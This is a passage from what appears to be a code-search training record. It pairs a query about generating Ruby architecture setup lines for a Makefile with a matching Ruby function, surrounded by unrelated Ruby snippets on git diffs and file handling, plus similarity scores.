"def file_staged?(path)\n command = 'git diff --cached --name-only'\n output = command_stdout(command)\n prefix = repo_root\n output.each_line do |line|\n line.strip!\n return true if path == \"#{prefix}/#{line}\"\n end\n false\n end",
"def top_dsl_file_changed?(repo_diffs_summary)\n top_dsl_file_changed = false\n TOP_DSL_FILE_REGEXPS.each do | top_dsl_file_regexp |\n top_dsl_file_changed = true if repo_diffs_summary.prune!(top_dsl_file_regexp)\n end\n top_dsl_file_changed\n end",
"def files_changed_in_patch(patchfile, tap)\n files = []\n formulae = []\n others = []\n File.foreach(patchfile) do |line|\n files << Regexp.last_match(1) if line =~ %r{^\\+\\+\\+ b/(.*)}\n end\n files.each do |file|\n if tap&.formula_file?(file)\n formula_name = File.basename(file, \".rb\")\n formulae << formula_name unless formulae.include?(formula_name)\n else\n others << file\n end\n end\n { files: files, formulae: formulae, others: others }\n end",
"def files_changed_in_patch(patchfile, tap)\n files = []\n formulae = []\n others = []\n File.foreach(patchfile) do |line|\n files << Regexp.last_match(1) if line =~ %r{^\\+\\+\\+ b/(.*)}\n end\n files.each do |file|\n if tap&.formula_file?(file)\n formula_name = File.basename(file, \".rb\")\n formulae << formula_name unless formulae.include?(formula_name)\n else\n others << file\n end\n end\n { files: files, formulae: formulae, others: others }\n end",
"def check_changed_files(git)\n git.status.select {|file| file.type || file.untracked }\n end",
"def native(from,to)\n command = \"cd #{@repodir} ; git diff --name-status #{from} #{to}\"\n puts \"Checking difference : \\n#{command}\"\n result = `#{command}`\n exitcode = $?\n exit -1 unless exitcode == 0\n return result.split(/\\n/)\n end",
"def changed_files(parent_sha, change_sha, node)\n response = shell_out!(\n \"git diff --name-only #{parent_sha} #{change_sha}\",\n :cwd => node['delivery']['workspace']['repo']\n ).stdout.strip\n\n changed_files = []\n response.each_line do |line|\n changed_files << line.strip\n end\n changed_files\n end",
"def file_changes?\n all_files = git.modified_files + git.added_files\n Danger::Changelog::Config.ignore_files.each do |f|\n all_files.reject! { |modified_file| f.is_a?(Regexp) ? f.match?(modified_file) : f == modified_file }\n break if all_files.empty?\n end\n all_files.any?\n end",
"def mirror_file(source, dest, copied = [], duplicated = [], postfix = '_override')\n base, rest = split_name(source)\n dst_dir = File.dirname(dest)\n dup_path = dst_dir / \"#{base}#{postfix}.#{rest}\" \n if File.file?(source)\n mkdir_p(dst_dir) unless File.directory?(dst_dir)\n if File.exists?(dest) && !File.exists?(dup_path) && !FileUtils.identical?(source, dest)\n # copy app-level override to *_override.ext\n copy_entry(dest, dup_path, false, false, true)\n duplicated << dup_path.relative_path_from(Merb.root)\n end\n # copy gem-level original to location\n if !File.exists?(dest) || (File.exists?(dest) && !FileUtils.identical?(source, dest))\n copy_entry(source, dest, false, false, true) \n copied << dest.relative_path_from(Merb.root)\n end\n end\n end",
"def update!\n if path = vendorized?\n type = File.symlink?(path) ? :symlink : :copy\n FileUtils.rm_rf normalize(:lib)\n send \"vendorize_with_#{type}\"\n say \"updated #{type} #{path} -> #{program(:version)}\"\n else\n ['dom.html', 'rhino.js', 'node.js'].each do |path|\n path = normalize path\n next unless File.exists? path\n contents = File.read(path).gsub /jspec-(\\d+\\.\\d+\\.\\d+)/, \"jspec-#{program(:version)}\"\n if program(:version) == $1\n say \"skipping #{path}; already #{$1}\"\n next\n end\n File.open(path, 'r+'){ |file| file.write contents } \n say \"updated #{path}; #{$1} -> #{program(:version)}\"\n end\n end\n end",
"def files_to_diff\n files = {}\n COMPARISON_PATHS.each do |framework_dir, project_dir|\n Dir.new(\"#{get_path_to_rails_gem}#{framework_dir}\").entries.reject { |e| /^\\./.match(e) }.each do |file|\n framework_file = \"#{get_path_to_rails_gem}#{framework_dir}#{file}\"\n project_file = \"#{project_path}#{project_dir}#{file}\" \n files[framework_file] = project_file\n end\n end\n \n COMPARISON_FILES.each do |framework_file, project_file|\n files[\"#{get_path_to_rails_gem}#{framework_file}\"] = \"#{project_path}#{project_file}\"\n end\n \n files\n end",
"def modified_since_last_time(previous_db_image, new_db_image)\n return true if ! previous_db_image\n previous_db_image.sha1sum != new_db_image.sha1sum\n end",
"def createDiffResult(working_dir, channel_cfg, vimapp, isReleaseOperator,backupRoot)\n\n remotedir = readChannelDir(channel_cfg, vimapp) + \"/\"+ File.basename(working_dir)\n puts remotedir.green\n if File.directory?(remotedir) == false\n FileUtils.mkdir_p remotedir\n end\n\n reportFile1 = \"#{remotedir}/report\"\n reportFile2 = \"#{remotedir}/rdetail\"\n lines = File.open(reportFile1, \"r:UTF-8\").each_line.to_a\n\n hashes = Array.new\n lines.each do |line|\n if line.start_with? \"hash=\"\n hashes.push line.gsub(\"hash=\",\"\").strip.chomp\n end\n end\n\n g = gitOpen(working_dir)\n \n logs = getGitLog(g)\n local_branches = getGitBranches(g)[:local]\n diff = compareHashes g, logs, hashes\n \n def getDiffDetails(diffinfo)\n puts \"diffdetails\"\n data = Array.new \n\n diffinfo[:files].each do |file|\n print \"[\"\n print file[0].cyan\n print \"] \"\n print \"[+] #{file[1][:insertions]}\".green\n print \" \"\n print \"[-] #{file[1][:deletions]}\".red\n puts\n # file, insertions, deletions\n data.push \"file=#{file[0]},#{file[1][:insertions]},#{file[1][:deletions]}\"\n end\n\n return data \n end\n\n diff_details = getDiffDetails diff[1]\n \n puts \"\\n\\n|||||||||||||||||||||||||WRITE|||||||||||||||||||||||||||||||||\\n\\n\"\n\n puts \"hash=\"+diff[2]\n puts \"hash=\"+diff[3]\n diff_details.each do |d| \n puts d\n end\n\n diffReportDir = \"#{working_dir}/.diffreport\"\n FileUtils.mkdir_p diffReportDir \n\n #write diff detail to file \n r_detail = \"#{diffReportDir}/detail\"\n\n puts \">> 222\"\n f = File.open(r_detail, \"w:UTF-8\")\n diff[0].each do |l|\n f.puts l\n end\n f.close\n\n f = File.open(r_detail+\".color\", \"w:UTF-8\")\n diff[0].each do |l|\n if isPlus(l)\n f.puts l.green\n elsif isMinus(l)\n f.puts l.red\n else\n f.puts l\n end\n end\n f.close\n\n puts \">> 111\"\n #write diff to file\n diffReport = \"#{diffReportDir}/report\"\n f = File.open(diffReport, \"w:UTF-8\")\n f.puts \"hash=\"+diff[2]\n f.puts \"hash=\"+diff[3]\n diff_details.each do |d| \n f.puts d\n end\n f.close\n puts \"\\n\\nWRITTEN\\n\\n\".green\n\n if isReleaseOperator == false\n FileUtils.cp \"#{diffReport}\", \"#{reportFile1}\"\n FileUtils.cp \"#{r_detail}\", \"#{reportFile2}\"\n else\n metaOK = FileUtils.identical?(diffReport, reportFile1)\n detailOK = FileUtils.identical?(r_detail, reportFile2)\n \n puts \n print \"[ OVERVIEWS ] \" #metaOK.to_s.red\n puts metaOK ? \"IDENTICAL\".green : \"DIFFERENT\".red\n print \"[CODE DETAILS] \"\n puts detailOK ? \"IDENTICAL\".green : \"DIFFERENT\".red\n puts\n def compare(file1, file2)\n puts \">> compare\"\n lines1 = File.open(file1, \"r:UTF-8\").each_line.to_a\n lines2 = File.open(file2, \"r:UTF-8\").each_line.to_a\n def showInclusion(lines1, lines2, i)\n lines1.each do |line|\n if lines2.include?(line) == false\n if i == true\n puts \"[YOURS] \"+ line.chomp.cyan\n else\n puts \"[REMOTE] \"+ line.chomp.yellow\n end\n end\n end\n end\n showInclusion(lines1, lines2, true)\n showInclusion(lines2, lines1, false)\n end\n compare diffReport, reportFile1\n compare r_detail, reportFile2\n end\n\n files = Array.new\n diff_details.each do |d| \n if d.start_with? \"file=\"\n files.push d.gsub(\"file=\",\"\").strip.chomp\n end\n end\n if hashes.size > 0\n #compareBackupsWithOldVersion(g, working_dir, backupRoot, files, hash) \n #compareBackupsWithOldVersion(g, working_dir,backupRoot,files, hash[1]) \n end\n end",
"def print_puppetfile_diff(old, new)\n # Build hashes mapping the module name to the module object. This makes it\n # a little easier to determine which modules have been added, removed, or\n # modified.\n old = (old&.modules || []).each_with_object({}) do |mod, acc|\n next unless mod.type == :forge\n acc[mod.full_name] = mod\n end\n\n new = new.modules.each_with_object({}) do |mod, acc|\n next unless mod.type == :forge\n acc[mod.full_name] = mod\n end\n\n # New modules are those present in new but not in old.\n added = new.reject { |full_name, _mod| old.include?(full_name) }.values\n\n if added.any?\n diff = \"Adding the following modules:\\n\"\n added.each { |mod| diff += \"#{mod.full_name} #{mod.version}\\n\" }\n @outputter.print_action_step(diff)\n end\n\n # Upgraded modules are those that have a newer version in new than old.\n upgraded = new.select do |full_name, mod|\n if old.include?(full_name)\n mod.version > old[full_name].version\n end\n end.keys\n\n if upgraded.any?\n diff = \"Upgrading the following modules:\\n\"\n upgraded.each { |full_name| diff += \"#{full_name} #{old[full_name].version} to #{new[full_name].version}\\n\" }\n @outputter.print_action_step(diff)\n end\n\n # Downgraded modules are those that have an older version in new than old.\n downgraded = new.select do |full_name, mod|\n if old.include?(full_name)\n mod.version < old[full_name].version\n end\n end.keys\n\n if downgraded.any?\n diff = \"Downgrading the following modules: \\n\"\n downgraded.each { |full_name| diff += \"#{full_name} #{old[full_name].version} to #{new[full_name].version}\\n\" }\n @outputter.print_action_step(diff)\n end\n\n # Removed modules are those present in old but not in new.\n removed = old.reject { |full_name, _mod| new.include?(full_name) }.values\n\n if removed.any?\n diff = \"Removing the following modules:\\n\"\n removed.each { |mod| diff += \"#{mod.full_name} #{mod.version}\\n\" }\n @outputter.print_action_step(diff)\n end\n end",
"def diff1; end",
"def test_pull_a_new_file_into_a_modified_tree\n b.add(\"dir/three\" => \"three content\").commit(\"b added three\")\n a.add(\"dir/two\" => \"two content\").commit(\"a added two\")\n \n assert_equal \"two content\", a['dir/two']\n assert_equal nil, b['dir/two']\n assert_equal \"three content\", b['dir/three']\n \n b.pull\n \n assert_equal \"two content\", a['dir/two']\n assert_equal \"two content\", b['dir/two']\n assert_equal \"three content\", b['dir/three']\n \n assert_log_equal [\n \"a added one\",\n \"a added two\",\n \"b added three\", \n \"gitgo merge of origin/gitgo into gitgo\"\n ], b\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/RYLabs/rails-devcontainer-template.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-devcontainer-template/(.+)/rails-postgres.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def changelog_has_been_modified\n\n modified = git.modified_files.include?(\"CHANGELOG.md\")\n return modified\n\nend",
"def git_changes?\n Dir.chdir(@dir) do\n git = Process.spawn('git', 'diff-index', '--cached', '--quiet', 'HEAD')\n Process.wait(git)\n raise \"git diff-index failed weirdly: #{$?.exitstatus}\" if $?.exitstatus > 1\n $?.exitstatus == 1\n end\n end",
"def test_ut_diff_source_code_02\n assert_equal(1,@diff_source_code_1.diff_result_id)\n assert_equal(1,@diff_source_code_1.original_file_id)\n assert_equal(1,@diff_source_code_1.diff_file_id)\n assert_equal(nil,@diff_source_code_1.added_lines)\n assert_equal(\"7;8;9;25;390;396;397;400;404\",@diff_source_code_1.deleted_lines)\n assert_equal(\"1,1;2,2;3,3;4,4;6,6;10,10;11,11;12,12;13,13;14,14;15,15;\",@diff_source_code_1.common_lines)\n end"
] | [
"0.69058627",
"0.6773206",
"0.6525139",
"0.6017702",
"0.5980599",
"0.5980599",
"0.5971509",
"0.5917137",
"0.5833289",
"0.57902545",
"0.5734645",
"0.56653184",
"0.5664062",
"0.56551045",
"0.56526834",
"0.5645943",
"0.5645111",
"0.5638795",
"0.56369454",
"0.56161374",
"0.5613723",
"0.5611553",
"0.5586492",
"0.5585269",
"0.5567075",
"0.5540067",
"0.55274576",
"0.55086786",
"0.5506268",
"0.55007255",
"0.5486256",
"0.5480861",
"0.5478233",
"0.5472016",
"0.54628575",
"0.5461845",
"0.5460725",
"0.54535836",
"0.5446455",
"0.54318297",
"0.54026127",
"0.5389423",
"0.5387959",
"0.5386508",
"0.53742987",
"0.536955",
"0.5367678",
"0.5366792",
"0.536116",
"0.5353928",
"0.53395265",
"0.5290706",
"0.5289717",
"0.5273777",
"0.5262564",
"0.5260469",
"0.52578866",
"0.5252856",
"0.52329236",
"0.5229954",
"0.5229886",
"0.52225345",
"0.52215725",
"0.5211788",
"0.5209848",
"0.5199204",
"0.51968867",
"0.51758355",
"0.5165089",
"0.51626843",
"0.5153701",
"0.51501536",
"0.5148427",
"0.51446366",
"0.5144582",
"0.51255316",
"0.51200885",
"0.51192874",
"0.5113915",
"0.5107907",
"0.5106633",
"0.5105453",
"0.510286",
"0.510286",
"0.5100825",
"0.5092435",
"0.5091264",
"0.50806165",
"0.5080047",
"0.5075123",
"0.50651354",
"0.50560635",
"0.50493526",
"0.5048045",
"0.5042054",
"0.5041597",
"0.5039692",
"0.50360817",
"0.50340873",
"0.50339746"
] | 0.6427643 | 3 |
Compute the ruby arch setup for passing through sed escaping is required for using with file rendering no escaping is required | def ruby_arch_setup(do_escape = false)
Packager.info "Creating ruby env setup"
if do_escape
setup = Regexp.escape("arch=$(shell gcc -print-multiarch)\n")
# Extract the default ruby version to build for on that platform
# this assumes a proper setup of /usr/bin/ruby
setup += Regexp.escape("ruby_ver=$(shell ruby -r rbconfig -e ") + "\\\"print RbConfig::CONFIG[\'ruby_version\']\\\")" + Regexp.escape("\n")
setup += Regexp.escape("ruby_arch_dir=$(shell ruby -r rbconfig -e ") + "\\\"print RbConfig::CONFIG[\'archdir\']\\\")" + Regexp.escape("\n")
setup += Regexp.escape("ruby_libdir=$(shell ruby -r rbconfig -e ") + "\\\"print RbConfig::CONFIG[\'rubylibdir\']\\\")" + Regexp.escape("\n")
setup += Regexp.escape("rockruby_archdir=$(subst /usr,,$(ruby_arch_dir))\n")
setup += Regexp.escape("rockruby_libdir=$(subst /usr,,$(ruby_libdir))\n")
else
setup = "arch=$(shell gcc -print-multiarch)\n"
# Extract the default ruby version to build for on that platform
# this assumes a proper setup of /usr/bin/ruby
setup += "ruby_ver=$(shell ruby -r rbconfig -e \"print RbConfig::CONFIG[\'ruby_version\']\")\n"
setup += "ruby_arch_dir=$(shell ruby -r rbconfig -e \"print RbConfig::CONFIG[\'archdir\']\")\n"
setup += "ruby_libdir=$(shell ruby -r rbconfig -e \"print RbConfig::CONFIG[\'rubylibdir\']\")\n"
setup += "rockruby_archdir=$(subst /usr,,$(ruby_arch_dir))\n"
setup += "rockruby_libdir=$(subst /usr,,$(ruby_libdir))\n"
end
Packager.info "Ruby env setup is:\n#{setup}"
setup
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def shell_ruby_platform\n `ruby -rrbconfig -e \"puts RbConfig::CONFIG['sitearchdir']\"`\n end",
"def archs_for_command cmd\n cmd = cmd.to_s # If we were passed a Pathname, turn it into a string.\n cmd = `/usr/bin/which #{cmd}` unless Pathname.new(cmd).absolute?\n cmd.gsub! ' ', '\\\\ ' # Escape spaces in the filename.\n\n archs = IO.popen(\"/usr/bin/file #{cmd}\").readlines.inject([]) do |archs, line|\n case line\n when /Mach-O (executable|dynamically linked shared library) ppc/\n archs << :ppc7400\n when /Mach-O 64-bit (executable|dynamically linked shared library) ppc64/\n archs << :ppc64\n when /Mach-O (executable|dynamically linked shared library) i386/\n archs << :i386\n when /Mach-O 64-bit (executable|dynamically linked shared library) x86_64/\n archs << :x86_64\n else\n archs\n end\n end\n archs.extend(ArchitectureListExtension)\nend",
"def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end",
"def GetArchOfELF(filename)\n bash_out = Convert.to_map(\n SCR.Execute(\n path(\".target.bash_output\"),\n Ops.add(Ops.add(Directory.ybindir, \"/elf-arch \"), filename)\n )\n )\n return \"unknown\" if Ops.get_integer(bash_out, \"exit\", 1) != 0\n Builtins.deletechars(Ops.get_string(bash_out, \"stdout\", \"unknown\"), \"\\n\")\n end",
"def get_archs(lib_path)\n cmd('lipo', '-info', lib_path).split(':').last.strip.split(/\\s/)\nend",
"def ruby_arch\n case Common.target_platform\n when /darwin/\n 'x86_64-darwin10'\n when 'linux-x86_64'\n 'x86_64-linux'\n when 'linux-x86'\n 'i686-linux'\n when /windows/\n 'x64-mingw64'\n end\nend",
"def canonical_arch\n Config::CONFIG['arch'].sub(/[\\.0-9]*$/, '')\n end",
"def determine_system_architecture\n @info[:arch] = @shell.query('UNAME', 'uname -m')\n @info[:arch].gsub!(/i\\d86/, 'i386')\n end",
"def _ARCH; Config._ARCH; end",
"def get_arch\n if defined?(@arch) then return @arch else @arch = nil end\n search = File.join(@path, '{*/system32,{i386,amd64}}/ntdll.dll')\n ntdlls = Dir.glob(search, File::FNM_CASEFOLD)\n if ntdlls.length > 0\n machine = %x{pev -c #{ntdlls.first} | grep -i Machine}\n if $?.success?\n @arch = '64-bit' if machine =~ /0x8664/\n @arch = '32-bit' if machine =~ /14c/\n end\n else\n search = File.join(@path, 'sources/{setup.exe,winsetup.dll}')\n setup = Dir.glob(search, File::FNM_CASEFOLD)\n setup.each do |file|\n machine = %x{pev -c #{file} | grep -i Machine}\n if $?.success?\n @arch = '64-bit' if machine =~ /0x8664/\n @arch = '32-bit' if machine =~ /14c/\n break\n end\n end # end of setup block\n begin\n get_xmlinfo if not defined?(@xmlinfo)\n arches = REXML::XPath.match(@xmlinfo, '/WIM/IMAGE/WINDOWS/ARCH/text()')\n arch = arches.first\n if arches.count(arch) == arches.size\n arch = Integer(arch.to_s)\n @arch = '64-bit' if arch == 9\n @arch = '32-bit' if arch == 0\n else\n @arch = '32/64-bit' unless @arch\n end\n rescue Exception => e\n # puts \"error(get_arch): #{e}\"\n end\n end\n @arch\n end",
"def arch_for_filename(path)\n file = File.basename(path, File.extname(path))\n\n case file\n when /686/, /386/\n '32-bit'\n when /86_64/, /amd64/\n '64-bit'\n else\n parts = file.split('_')\n\n if parts.empty?\n raise \"Could not determine arch for filename `#{file}'!\"\n end\n\n parts.last.capitalize\n end\n end",
"def initialize(str = nil, existing = nil)\n\n @system_ruby = false\n self.env_output = {}\n str = get_alias(str)\n\n case str\n when 'system'\n @system_ruby = true\n return\n\n when '', nil\n if existing\n # find version from existing rubies\n @interpreter, @version, @patchlevel, @gemset =\n parse_ruby_string(get_existing_ruby(config_db(\"interpreter\")))\n else\n @interpreter = config_db(\"interpreter\")\n @version = config_db(interpreter, \"version\")\n @patchlevel = config_db(interpreter, version, \"patchlevel\")\n end\n\n else\n @interpreter, @version, @patchlevel, @gemset = parse_ruby_string(str)\n\n if interpreter.nil? && version\n case version\n when /^1\\.(8\\.[6-7]|9\\.[1-3])$/\n @interpreter = \"ruby\"\n when /^1\\.[3-6].*$/\n @interpreter = \"jruby\"\n when /^1\\.[0-2]\\.\\d$/\n @interpreter = \"rbx\"\n when /^\\d*$/\n @interpreter = \"maglev\"\n when /^0\\.8|nightly$/\n @interpreter = \"macruby\"\n end\n elsif interpreter.nil? && version.nil?\n log(\"Ruby string not understood: #{str}\", \"debug\")\n end\n\n if !interpreters.include?(interpreter)\n log(\"Invalid ruby interpreter: #{interpreter}\", \"debug\")\n end\n\n if existing\n i, v, p, g = parse_ruby_string(get_existing_ruby(str))\n @version ||= v\n @patchlevel ||= p\n else\n @version ||= config_db(interpreter, \"version\")\n @patchlevel ||= config_db(interpreter, version, \"patchlevel\")\n end\n end\n\n # TODO use existing to pick suitable ruby if specified\n\n @ruby_string = \"#{interpreter}\"\n @ruby_string += \"-#{version}\" if version\n if patchlevel\n if interpreter == \"ruby\"\n @patchlevel.delete!('p')\n @ruby_string += \"-p#{patchlevel}\"\n else\n @ruby_string += \"-#{patchlevel}\"\n end\n end\n\n @ruby_home = File.join(env.path, \"rubies\", ruby_string)\n @gem_base = File.join(env.gems_path, ruby_string)\n if gemset\n @gem_home = \"#{gem_base}#{env.gemset_separator}#{gemset}\"\n else\n @gem_home = gem_base\n end\n @global_gem_home = \"#{gem_base}#{env.gemset_separator}global\"\n @gem_path = \"#{gem_home}:#{global_gem_home}\"\n\n # TODO why aren't some interpreters in config/known?\n if !known?\n log(\"Unknown ruby specification: #{str} -> #{ruby_string}. Proceeding...\", \"debug\")\n end\n if !valid?\n reset\n @ruby_string = str\n log(\"Invalid ruby specificiation: #{str}\", \"debug\")\n return\n elsif existing && !installed?\n reset\n @ruby_string = str\n log(\"No installed ruby with specificiation: #{str}\", \"debug\")\n return\n end\n end",
"def esc_seq!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 7 )\n\n \n # - - - - main rule block - - - -\n # at line 295:5: ( '\\\\\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\\\\\"' | '\\\\'' | '\\\\\\\\' | 'e' ) | UNICODE_ESC | OCTAL_ESC )\n alt_2 = 3\n look_2_0 = @input.peek( 1 )\n\n if ( look_2_0 == 0x5c )\n case look_2 = @input.peek( 2 )\n when 0x22, 0x27, 0x5c, 0x62, 0x65, 0x66, 0x6e, 0x72, 0x74 then alt_2 = 1\n when 0x75 then alt_2 = 2\n when 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37 then alt_2 = 3\n else\n raise NoViableAlternative( \"\", 2, 1 )\n end\n else\n raise NoViableAlternative( \"\", 2, 0 )\n end\n case alt_2\n when 1\n # at line 295:9: '\\\\\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\\\\\"' | '\\\\'' | '\\\\\\\\' | 'e' )\n match( 0x5c )\n if @input.peek(1) == 0x22 || @input.peek(1) == 0x27 || @input.peek(1) == 0x5c || @input.peek(1) == 0x62 || @input.peek( 1 ).between?( 0x65, 0x66 ) || @input.peek(1) == 0x6e || @input.peek(1) == 0x72 || @input.peek(1) == 0x74\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n end\n\n\n\n when 2\n # at line 296:9: UNICODE_ESC\n unicode_esc!\n\n when 3\n # at line 297:9: OCTAL_ESC\n octal_esc!\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 7 )\n\n end",
"def preprocess\n lineno = 0\n shouldWrite = false\n inFunction = false\n printer = File.open(RB_FILE,'w')\n scanner = File.open(TEX_FILE,'r')\n if printer && scanner\n printer.puts RB_REQUIRE\n scanner.each_line do |line|\n lineno = lineno + 1\n if (line.include? TEX_ENV_01_E) && !determineTexCommented(line, TEX_ENV_01_E)\n puts \"Encountered #{TEX_ENV_01_E} on line #{lineno}\"\n shouldWrite = false\n end\n if shouldWrite\n stripped = line.strip\n if (stripped.include? TEX_MOD) && !determineRubyCommented(stripped, TEX_MOD) && !inFunction\n printer.print appendLineNumberToTexPrintCall(stripped, lineno)\n elsif (stripped.include? RB_CLASS_CREATE) && !determineRubyCommented(stripped, RB_CLASS_CREATE) && !inFunction\n printer.print appendLineNumberToInitialization(stripped, lineno)\n elsif (stripped.include? RB_METHOD_S) && !determineRubyCommented(stripped, RB_METHOD_S) && !inFunction\n puts \"Processing function definition: found line containing #{stripped}\"\n inFunction = true\n extracted = extractFunctionMeta stripped\n $fcnref.store(extracted[0], extracted[1])\n $defstack.push 1\n if (stripped.include? '(') && (stripped.include? ')')\n puts \"Injection into formatted def as \\( \\)! Boo!\"\n else\n puts \"Injection into formatted def as _,_! This is preferrable.\"\n end\n printer.print appendLineNumberArgToFunctionDefinition stripped\n elsif inFunction\n puts \"Parsing #{stripped} inside function...\"\n printer.print stripped\n if (line.include? TEX_MOD) && !determineRubyCommented(line, \"Tex\")\n printer.print \", #{RBTEX_INSERT_LINE}\"\n end\n RB_KEYWORD_END.each do |kwd|\n if line.include? kwd\n puts \"Encountered '#{kwd}'; pushing onto stack...\"\n $defstack.push 1\n break\n end\n end\n if line.include? 'end'\n puts \"Encountered 'end'; popping off of stack...\"\n $defstack.pop\n end\n inFunction = $defstack.any?\n else\n print \"STRIPPED: #{stripped}\\t\"\n deffed = false\n printer.print stripped\n $fcnref.each do |fcn, args|\n if stripped.include? fcn\n if (line.include? '(') && (line.include? ')')\n\n else\n printer.print (args != 0) ? (\", #{lineno}\") : (\" #{lineno}\")\n break\n end\n end\n end\n end\n printer.puts \"\"\n end\n if (line.include? TEX_ENV_01_S) && !determineTexCommented(line, TEX_ENV_01_S)\n puts \"Encountered #{TEX_ENV_01_S} on line #{lineno}\"\n $rbenvs = $rbenvs + 1\n shouldWrite = true\n end\n end\n end\n printer.close\n scanner.close\n return 0\nend",
"def platform_merge ln\n flds = ln.split(' ')\n return if flds[0].to_i == 0\n # app-version-arch'\n fname = flds[2]\n #parts = fname.split('-')\n #return if parts[length] < 3\n #puts \"fname = #{fname}\"\n case ln\n when /32\\.exe$/\n @platforms['Win32'] = ln\n when /\\.tbz$/\n return # ignore \n when /\\.run$/\n return # short circuit - ignore .runs in 3.2.15+ \n when /osx\\-.*\\.tgz$/\n @platforms['OSX'] = ln\n when /armhf\\.run$/\n @platforms['Linux_Raspberry'] = ln\n when /i686\\.run$/\n @platforms['Linux_i686'] = ln\n when /x86_64\\.run$/ \n @platforms['Linux_x86_64'] = ln\n when /armhf\\.install$/\n @platforms['Linux_Raspberry'] = ln\n when /i686\\.install$/\n @platforms['Linux_i686'] = ln\n when /x86_64\\.install$/ \n @platforms['Linux_x86_64'] = ln\n when /tar\\.gz$/\n tarball = ln\n else\n #puts \"failed match #{ln}\"\n end\n return\n end",
"def firmware_and_environment\n\t\t'#{firmware_revision}' + '--' + '#{environment}'\n\tend",
"def app_spec_and_code\n shell_friendly_spec = {\n spec: @app.spec,\n assets: @app.ordered_assets,\n packages: @app.packages,\n }.to_json.shellescape\n\n shell_friendly_code = { code: @app.code }.to_json.shellescape\n\n cmds = []\n cmds << \"RUN \" + [\"/bin/bash\", \"-c\", \"echo -E #{shell_friendly_spec} > /spec.json\"].to_json\n cmds << \"RUN \" + [\"/bin/bash\", \"-c\", \"echo -E #{shell_friendly_code} | python -c 'import sys,json; print json.load(sys.stdin)[\\\"code\\\"]' > /script.sh\"].to_json\n\n <<~APP_SPEC\n # Write app spec and code to root folder\n #{cmds.join(\"\\n\")}\n APP_SPEC\n end",
"def convert_to_ruby (src)\n rb = \"\"\n # dunno how to deal with only leading declarations of ruby code,\n # so replace it with the other markings\n src.gsub!(/-%>/,\"%>\")\n while\tsrc.index(Embedded_ruby_line) != nil\n src.sub!(Embedded_ruby_line) { |match|\n match[match.index '%'] = \" \"\n \"<% \" + match + \" %>\"\n }\n end\n lines = src.split(Embedded_ruby_flag)\n\n is_ruby_line = false\n lines.each { |line|\n if (line.strip != \"\" and line.strip != nil)\n if is_ruby_line\n if line[0,1] == '='\n # line[0] = \" \"\n # rb += \"puts \" + line.strip\n rb+=\"gr_html_puts \"+line.strip\n else\n rb += line.strip\n end\n else\n rb += \"gr_html( \" + line.inspect + \" )\"\n end\n rb += \"\\n\"\n end\n is_ruby_line = (not is_ruby_line)\n }\n #puts rb\n return rb\n end",
"def arch\n x86_64? ? \"amd64\" : \"i386\"\n end",
"def e_sh_js(str)\n (e_sh str).gsub(\"\\\\\", \"\\\\\\\\\\\\\\\\\")\nend",
"def escape(line)\n s = line.sub(/\\s+$/, '').\n gsub(/\\\\/, \"\\\\bs\\?C-q\").\n gsub(/([_\\${}&%#])/, '\\\\\\\\\\1').\n gsub(/\\?C-q/, \"{}\").\n gsub(/\\^/, \"\\\\up{}\").\n gsub(/~/, \"\\\\sd{}\").\n gsub(/\\*/, \"$*$\").\n gsub(/<</, \"<{}<\").\n gsub(/>>/, \">{}>\").\n gsub(/\\[\\]/, \"$[\\\\,]$\").\n gsub(/,,/, \",{},\").\n gsub(/`/, \"\\\\bq{}\")\n s\nend",
"def patches\n system \"cp src/Makefile.in src/Makefile.in.dos\"\n system \"tr -d '\\r' <src/Makefile.in.dos> src/Makefile.in\"\n DATA\n end",
"def rpm_arch\n @lead.arch\n end",
"def assembler_options src,component,system_config\n config=system_config.platform_config(component.platform)\n output=object_file(src,component,system_config)\n opts= config['assembler_options'].split(' ')\n opts<< \"#{config['assembler_out']}#{output}\"\n opts+= prefixed_objects(component.include_paths,config['assembler_include'])\n opts<< src\n end",
"def octal_esc!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 8 )\n\n \n # - - - - main rule block - - - -\n # at line 302:5: ( '\\\\\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\\\\\' ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\\\\\' ( '0' .. '7' ) )\n alt_3 = 3\n look_3_0 = @input.peek( 1 )\n\n if ( look_3_0 == 0x5c )\n look_3_1 = @input.peek( 2 )\n\n if ( look_3_1.between?( 0x30, 0x33 ) )\n look_3_2 = @input.peek( 3 )\n\n if ( look_3_2.between?( 0x30, 0x37 ) )\n look_3_4 = @input.peek( 4 )\n\n if ( look_3_4.between?( 0x30, 0x37 ) )\n alt_3 = 1\n else\n alt_3 = 2\n end\n else\n alt_3 = 3\n end\n elsif ( look_3_1.between?( 0x34, 0x37 ) )\n look_3_3 = @input.peek( 3 )\n\n if ( look_3_3.between?( 0x30, 0x37 ) )\n alt_3 = 2\n else\n alt_3 = 3\n end\n else\n raise NoViableAlternative( \"\", 3, 1 )\n end\n else\n raise NoViableAlternative( \"\", 3, 0 )\n end\n case alt_3\n when 1\n # at line 302:9: '\\\\\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' )\n match( 0x5c )\n # at line 302:14: ( '0' .. '3' )\n # at line 302:15: '0' .. '3'\n match_range( 0x30, 0x33 )\n\n # at line 302:25: ( '0' .. '7' )\n # at line 302:26: '0' .. '7'\n match_range( 0x30, 0x37 )\n\n # at line 302:36: ( '0' 